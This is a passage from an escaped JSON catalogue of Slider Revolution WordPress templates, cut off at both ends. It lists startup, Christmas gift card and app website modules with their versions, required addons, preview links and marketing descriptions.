[Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-fun-way-to-design-the-cta-section-with-two-buttons\\/\",\"guide_img\":\"tutorial\\/startup-website-template.png\",\"active\":\"1\",\"package_id\":\"52\",\"installed\":false},\"571\":{\"id\":\"616\",\"title\":\"Startup CTA\",\"alias\":\"startup-cta\",\"zip\":\"packs\\/startup-cta.zip\",\"uid\":\"bfe7cb2a94dd8292179e16a986cf2748\",\"img\":\"startup-cta\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/startup-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=startup-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Launch your startup landing page in no time, with this colourful startup company website template, featuring a fresh, easy-to-read design and subtle animation effects.<br>\\r\\nWith the YouTube video modal and universally usable content blocks, this template can also be used as a company website template or a business portfolio template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-polyfold-addon\\\\\\/revslider-polyfold-addon.php\\\",\\\"name\\\":\\\"Polyfold Scroll Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-11-03 09:45:02\",\"package\":\"Startup Website Template\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Fun Way to Design the CTA Section with Two Buttons [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-fun-way-to-design-the-cta-section-with-two-buttons\\/\",\"guide_img\":\"tutorial\\/startup-website-template.png\",\"active\":\"1\",\"package_id\":\"52\",\"installed\":false},\"572\":{\"id\":\"617\",\"title\":\"Startup Footer\",\"alias\":\"startup-footer\",\"zip\":\"packs\\/startup-footer.zip\",\"uid\":\"d73466042d108699d366bf9cab2beaa8\",\"img\":\"startup-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/startup-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=startup-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Launch your startup landing page in no time, with this colourful startup company website template, featuring a fresh, easy-to-read design and subtle animation effects.<br>\\r\\nWith the YouTube video modal and universally usable content blocks, this template can also be used as a company website template or a business portfolio template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-11-03 09:46:31\",\"package\":\"Startup Website Template\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Fun Way to Design the CTA Section with Two Buttons [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-fun-way-to-design-the-cta-section-with-two-buttons\\/\",\"guide_img\":\"tutorial\\/startup-website-template.png\",\"active\":\"1\",\"package_id\":\"52\",\"installed\":false},\"573\":{\"id\":\"618\",\"title\":\"Startup Video Modal\",\"alias\":\"startup-video-modal\",\"zip\":\"packs\\/startup-video-modal.zip\",\"uid\":\"5fd53a8ad93456a152c25079f6437377\",\"img\":\"startup-video-modal\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/startup-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=startup-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Launch your startup landing page in no time, with this colourful startup company website template, featuring a fresh, easy-to-read design and subtle animation effects.<br>\\r\\nWith the YouTube video modal and universally usable content blocks, this template can also be used as a company website template or a business portfolio template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-11-03 09:47:44\",\"package\":\"Startup Website Template\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"A Fun Way to Design the CTA Section with Two Buttons [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-fun-way-to-design-the-cta-section-with-two-buttons\\/\",\"guide_img\":\"tutorial\\/startup-website-template.png\",\"active\":\"1\",\"package_id\":\"52\",\"installed\":false},\"574\":{\"id\":\"619\",\"title\":\"Christmas Gift Card Landing Page\",\"alias\":\"christmas-gift-card-landing-page\",\"zip\":\"\",\"uid\":\"christmas-gift-card-landing-page\",\"img\":\"packages\\/christmas-gift-card-landing-page.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/christmas-gift-card-landing-page\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=christmas-gift-card-landing-page\",\"version\":\"1.0.0\",\"required\":\"6.5.11\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">Greet and thank your visitors in a creative way during the Christmas Holidays with this dynamic, two-part Christmas gift card landing page. Ideal for e-commerce websites that want to give special discounts during the holidays. The first module can also be used on it\'s own to bring xmas vibes to any website!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\",\"Special FX\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-snow-addon\\\\\\/revslider-snow-addon.php\\\",\\\"name\\\":\\\"Snow AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-12-08 12:05:33\",\"package\":\"Christmas Gift Card Landing Page\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"53\",\"installed\":false},\"575\":{\"id\":\"620\",\"title\":\"Christmas Landing Page 1\",\"alias\":\"christmas-landing-page-1\",\"zip\":\"packs\\/christmas-landing-page-1.zip\",\"uid\":\"17eb656138d076ca1dc2d9fa5cefb1b8\",\"img\":\"christmas-gift-card-landing-page\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/christmas-gift-card-landing-page\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=christmas-gift-card-landing-page\",\"version\":\"1.0.0\",\"required\":\"6.5.11\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Greet and thank your visitors in a creative way during the Christmas Holidays with this dynamic, two-part Christmas gift card landing page. Ideal for e-commerce websites that want to give special discounts during the holidays. The first module can also be used on it\'s own to bring xmas vibes to any website!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\",\"Special FX\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-snow-addon\\\\\\/revslider-snow-addon.php\\\",\\\"name\\\":\\\"Snow AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-12-08 12:08:37\",\"package\":\"Christmas Gift Card Landing Page\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"53\",\"installed\":false},\"576\":{\"id\":\"621\",\"title\":\"Christmas Landing Page 2\",\"alias\":\"christmas-landing-page-2\",\"zip\":\"packs\\/christmas-landing-page-2.zip\",\"uid\":\"ea0d2cfdba50c8060c66ee7b979c3b83\",\"img\":\"christmas-landing-page-2\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/christmas-gift-card-landing-page\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=christmas-gift-card-landing-page\",\"version\":\"1.0.0\",\"required\":\"6.5.11\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Greet and thank your visitors in a creative way during the Christmas Holidays with this dynamic, two-part Christmas gift card landing page. Ideal for e-commerce websites that want to give special discounts during the holidays. The first module can also be used on it\'s own to bring xmas vibes to any website!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\",\"Special FX\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-snow-addon\\\\\\/revslider-snow-addon.php\\\",\\\"name\\\":\\\"Snow AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-12-08 12:10:54\",\"package\":\"Christmas Gift Card Landing Page\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"53\",\"installed\":false},\"577\":{\"id\":\"622\",\"title\":\"Image Slider\",\"alias\":\"image-slider\",\"zip\":\"image-slider.zip\",\"uid\":\"85a8fcfa9220809176bd3d6bc70b4abf\",\"img\":\"image-slider\\/slide-1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/newborn-image-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=newborn-image-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.12\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Get an instant \\\"wow\\\" from your visitors with this sleek background image slider, that includes a clean UI for easy navigation and smooth transitions.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-01-04 09:45:41\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"578\":{\"id\":\"623\",\"title\":\"Full Width Slider\",\"alias\":\"full-width-slider\",\"zip\":\"full-width-slider.zip\",\"uid\":\"e2792804e7a1f3ec9806f6a6225a559d\",\"img\":\"full-width-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/delicious-full-width-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=delicious-full-width-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">We\'ve prepared something tasty for you. A delicious looking, responsive full width slider, with a wide range of use cases and a plethora of smart, UI navigation options.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-01-10 11:40:04\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Visually Promote Products and Their Unique Scent Profiles Online [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-visually-promote-products-and-their-unique-scent-profiles-online\\/\",\"guide_img\":\"tutorial\\/full-width-slider.png\",\"active\":\"1\",\"installed\":false},\"579\":{\"id\":\"624\",\"title\":\"App Website Template\",\"alias\":\"app-website-template\",\"zip\":\"\",\"uid\":\"app-website-template\",\"img\":\"packages\\/app-website-template.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/spaceman-app-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=spaceman-app-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.14\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">From a stunning feature carousel, to a screenshot gallery and testimonial slider, this mobile app website template has got it all!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-01-17 10:22:53\",\"package\":\"App Website Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Creative Way to Design the Hero Image for Your Mobile App Landing Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-creative-way-to-design-the-hero-image-for-your-mobile-app-landing-page\\/\",\"guide_img\":\"tutorial\\/App-Website-Template.png\",\"active\":\"1\",\"package_id\":\"54\",\"installed\":false},\"580\":{\"id\":\"625\",\"title\":\"App Website Menu\",\"alias\":\"app-website-menu\",\"zip\":\"packs\\/app-website-menu.zip\",\"uid\":\"c3c100db368c091d01852df9851b9840\",\"img\":\"app-website-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/spaceman-app-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=spaceman-app-website-template\",\"version\":\"1.0.1\",\"required\":\"6.5.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">From a stunning feature carousel, to a screenshot gallery and testimonial slider, this mobile app website template has got it all!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-01-17 10:26:14\",\"package\":\"App Website Template\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Creative Way to Design the Hero Image for Your Mobile App Landing Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-creative-way-to-design-the-hero-image-for-your-mobile-app-landing-page\\/\",\"guide_img\":\"tutorial\\/App-Website-Template.png\",\"active\":\"1\",\"package_id\":\"54\",\"installed\":false},\"581\":{\"id\":\"626\",\"title\":\"App Website Hero\",\"alias\":\"app-website-hero\",\"zip\":\"packs\\/app-website-hero.zip\",\"uid\":\"4b42974b08f2923986932ed529974d6f\",\"img\":\"app-website-hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/spaceman-app-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=spaceman-app-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">From a stunning feature carousel, to a screenshot gallery and testimonial slider, this mobile app website template has got it all!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-01-17 10:29:00\",\"package\":\"App Website Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\" zindex=\\\"300\\\"\",\"guide_title\":\"A Creative Way to Design the Hero Image for Your Mobile App Landing Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-creative-way-to-design-the-hero-image-for-your-mobile-app-landing-page\\/\",\"guide_img\":\"tutorial\\/App-Website-Template.png\",\"active\":\"1\",\"package_id\":\"54\",\"installed\":false},\"582\":{\"id\":\"627\",\"title\":\"App Download Buttons\",\"alias\":\"app-download-buttons\",\"zip\":\"packs\\/app-download-buttons.zip\",\"uid\":\"d5ecce65284cc95c506185e6f6291d55\",\"img\":\"app-download-buttons\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/spaceman-app-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=spaceman-app-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">From a stunning feature carousel, to a screenshot gallery and testimonial slider, this mobile app website template has got it all!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2022-01-17 10:31:22\",\"package\":\"App Website Template\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Creative Way to Design the Hero Image for Your Mobile App Landing Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-creative-way-to-design-the-hero-image-for-your-mobile-app-landing-page\\/\",\"guide_img\":\"tutorial\\/App-Website-Template.png\",\"active\":\"1\",\"package_id\":\"54\",\"installed\":false},\"583\":{\"id\":\"628\",\"title\":\"App Website About\",\"alias\":\"app-website-about\",\"zip\":\"packs\\/app-website-about.zip\",\"uid\":\"984477b3ea7c943a7c6be78950754e3c\",\"img\":\"app-website-about\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/spaceman-app-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=spaceman-app-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">From a stunning feature carousel, to a screenshot gallery and testimonial slider, this mobile app website template has got it all!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2022-01-17 10:33:06\",\"package\":\"App Website Template\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Creative Way to Design the Hero Image for Your Mobile App Landing Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-creative-way-to-design-the-hero-image-for-your-mobile-app-landing-page\\/\",\"guide_img\":\"tutorial\\/App-Website-Template.png\",\"active\":\"1\",\"package_id\":\"54\",\"installed\":false},\"584\":{\"id\":\"629\",\"title\":\"App Website Features\",\"alias\":\"app-website-features\",\"zip\":\"packs\\/app-website-features.zip\",\"uid\":\"206a0f73553c974ad86790fba6a13efd\",\"img\":\"app-website-features\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/spaceman-app-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=spaceman-app-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">From a stunning feature carousel, to a screenshot gallery and testimonial slider, this mobile app website template has got it all!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2022-01-17 10:35:08\",\"package\":\"App Website Template\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Creative Way to Design the Hero Image for Your Mobile App Landing Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-creative-way-to-design-the-hero-image-for-your-mobile-app-landing-page\\/\",\"guide_img\":\"tutorial\\/App-Website-Template.png\",\"active\":\"1\",\"package_id\":\"54\",\"installed\":false},\"585\":{\"id\":\"630\",\"title\":\"App Website Video Cta\",\"alias\":\"app-website-video-cta\",\"zip\":\"packs\\/app-website-video-cta.zip\",\"uid\":\"19b2930f9cd9840dccbe94cb1cc435e2\",\"img\":\"app-website-video-cta\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/spaceman-app-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=spaceman-app-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">From a stunning feature carousel, to a screenshot gallery and testimonial slider, this mobile app website template has got it all!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-01-17 10:36:15\",\"package\":\"App Website Template\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Creative Way to Design the Hero Image for Your Mobile App Landing Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-creative-way-to-design-the-hero-image-for-your-mobile-app-landing-page\\/\",\"guide_img\":\"tutorial\\/App-Website-Template.png\",\"active\":\"1\",\"package_id\":\"54\",\"installed\":false},\"586\":{\"id\":\"631\",\"title\":\"App Website Screenshots\",\"alias\":\"app-website-screenshots\",\"zip\":\"packs\\/app-website-screenshots.zip\",\"uid\":\"94ce8eeecb7ffad62adc2d29b203f9d2\",\"img\":\"app-website-screenshots\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/spaceman-app-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=spaceman-app-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">From a stunning feature carousel, to a screenshot gallery and testimonial slider, this mobile app website template has got it all!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2022-01-17 10:38:15\",\"package\":\"App Website Template\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Creative Way to Design the Hero Image for Your Mobile App Landing Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-creative-way-to-design-the-hero-image-for-your-mobile-app-landing-page\\/\",\"guide_img\":\"tutorial\\/App-Website-Template.png\",\"active\":\"1\",\"package_id\":\"54\",\"installed\":false},\"587\":{\"id\":\"632\",\"title\":\"App Testimonials Title\",\"alias\":\"app-testimonials-title\",\"zip\":\"packs\\/app-testimonials-title.zip\",\"uid\":\"bea74fa6e180fe23007c3d215b1b0704\",\"img\":\"app-testimonials-title\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/spaceman-app-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=spaceman-app-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">From a stunning feature carousel, to a screenshot gallery and testimonial slider, this mobile app website template has got it all!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-01-17 10:40:21\",\"package\":\"App Website Template\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Creative Way to Design the Hero Image for Your Mobile App Landing Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-creative-way-to-design-the-hero-image-for-your-mobile-app-landing-page\\/\",\"guide_img\":\"tutorial\\/App-Website-Template.png\",\"active\":\"1\",\"package_id\":\"54\",\"installed\":false},\"588\":{\"id\":\"633\",\"title\":\"App Website Testimonials\",\"alias\":\"app-website-testimonials\",\"zip\":\"packs\\/app-website-testimonials.zip\",\"uid\":\"e7438a870ac1007da4c7821056d511fc\",\"img\":\"app-website-testimonials\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/spaceman-app-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=spaceman-app-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">From a stunning feature carousel, to a screenshot gallery and testimonial slider, this mobile app website template has got it all!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2022-01-17 10:41:59\",\"package\":\"App Website Template\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\" offset=\\\"t:-300px,-300px,-300px,-250px;b:0px,0px,0px,0px;l:0px,0px,0px,0px;r:0px,0px,0px,0px;\\\" zindex=\\\"300\\\"\",\"guide_title\":\"A Creative Way to Design the Hero Image for Your Mobile App Landing Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-creative-way-to-design-the-hero-image-for-your-mobile-app-landing-page\\/\",\"guide_img\":\"tutorial\\/App-Website-Template.png\",\"active\":\"1\",\"package_id\":\"54\",\"installed\":false},\"589\":{\"id\":\"634\",\"title\":\"App Website Team\",\"alias\":\"app-website-team\",\"zip\":\"packs\\/app-website-team.zip\",\"uid\":\"d9013f2968e43f696f8cc33fa3524071\",\"img\":\"app-website-team\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/spaceman-app-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=spaceman-app-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">From a stunning feature carousel, to a screenshot gallery and testimonial slider, this mobile app website template has got it all!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2022-01-17 10:43:40\",\"package\":\"App Website Template\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\" 